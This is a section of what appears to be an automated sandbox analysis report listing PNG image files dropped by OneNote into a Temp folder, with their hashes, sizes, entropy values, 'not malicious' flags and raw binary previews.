                                                                                                                                                    Preview:.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.*B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_.*..c..n.......?....wa..l...p....E.Ly.}...*...C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...|....*\..O.*....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..*k.Y....z.;?..^...3.4|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{3F5131D0-2964-4B33-9F49-08BF23A57A81}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):17289
                                                                                                                                                    Entropy (8bit):7.962998633267186
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                                                                    MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                                                                    SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                                                                    SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                                                                    SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w*.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }*...B@....i<8.....B@.T2 .........xp..! .....d@...!......(*B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.*&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{3F5DB1C9-193B-46A8-ADE9-665B90899D2D}

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):14553
                                                                                                                                                    Entropy (8bit):7.951135681293377
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                                                                    MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                                                                    SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                                                                    SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                                                                    SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..|.]....s.6[..H...N@.=M..|`...3./...I.....'..|..K...r|...nX...'.. .G...ib|...MY8|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K*.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.|....?.^..5^}..$.. .....S.@...*<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...|....W<{...g.&'Ca

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{4170D8C0-B872-4CCF-A71B-A1E30E7A125D}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1924
                                                                                                                                                    Entropy (8bit):7.836744258175623
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                                                                    MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                                                                    SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                                                                    SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                                                                    SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M*..J.....".4*....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o|.?.......;C|.#.../v.H.......o~.{G......H.|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O|.D...

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{451A3E96-B4B9-4608-80E7-17D276D6A423}

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):14553
                                                                                                                                                    Entropy (8bit):7.951135681293377
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                                                                    MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                                                                    SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                                                                    SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                                                                    SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..|.]....s.6[..H...N@.=M..|`...3./...I.....'..|..K...r|...nX...'.. .G...ib|...MY8|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K*.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.|....?.^..5^}..$.. .....S.@...*<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...|....W<{...g.&'Ca

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{45442089-EEE3-4B55-9CA2-F0BE31F7A074}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1657
                                                                                                                                                    Entropy (8bit):7.80882577056055
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                                                                    MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                                                                    SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                                                                    SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                                                                    SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{45A4ECBE-D65A-49F1-AAC5-8C26993226D8}

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1604
                                                                                                                                                    Entropy (8bit):7.814570704154439
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                    MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                    SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                    SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                    SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{462D736E-D37E-47A1-9656-C7A3222DF69D}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1604
                                                                                                                                                    Entropy (8bit):7.814570704154439
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                    MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                    SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                    SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                    SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{469906D9-9BBB-4454-8D26-DEF16D12D9E2}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):5386
                                                                                                                                                    Entropy (8bit):7.943706538857394
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                                                                    MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                                                                    SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                                                                    SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                                                                    SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{47DABD16-94DA-4D43-813B-10B0ADFDA7D2}

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):4490
                                                                                                                                                    Entropy (8bit):7.928016176674318
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                                                                    MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                                                                    SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                                                                    SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                                                                    SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.|...\.z..6j>..n....Y.&G*.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P...*..'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^..*...W..?}t...{.B.8..D...UPa..~..C...|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.....*..G...K.....e...b.|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{4821CED6-C57A-44EB-8A86-4CB5DB0FD8D2}

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):13241
                                                                                                                                                    Entropy (8bit):7.931391290415517
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                                                                    MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                                                                    SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                                                                    SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                                                                    SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......*EX........wo9..9.|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~.*.U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J*.w.mdv.&*..@....R..o/.^..5...x.g.>..ag....GM|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{4888551E-F554-438E-959C-17D0886467D2}

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):17289
                                                                                                                                                    Entropy (8bit):7.962998633267186
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                                                                    MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                                                                    SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                                                                    SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                                                                    SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w*.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }*...B@....i<8.....B@.T2 .........xp..! .....d@...!......(*B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.*&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{4D46DD88-9301-4883-91D8-CF46A6632E36}

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):2210
                                                                                                                                                    Entropy (8bit):7.86853667196985
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                                                                    MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                                                                    SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                                                                    SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                                                                    SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                                                                    Malicious:false
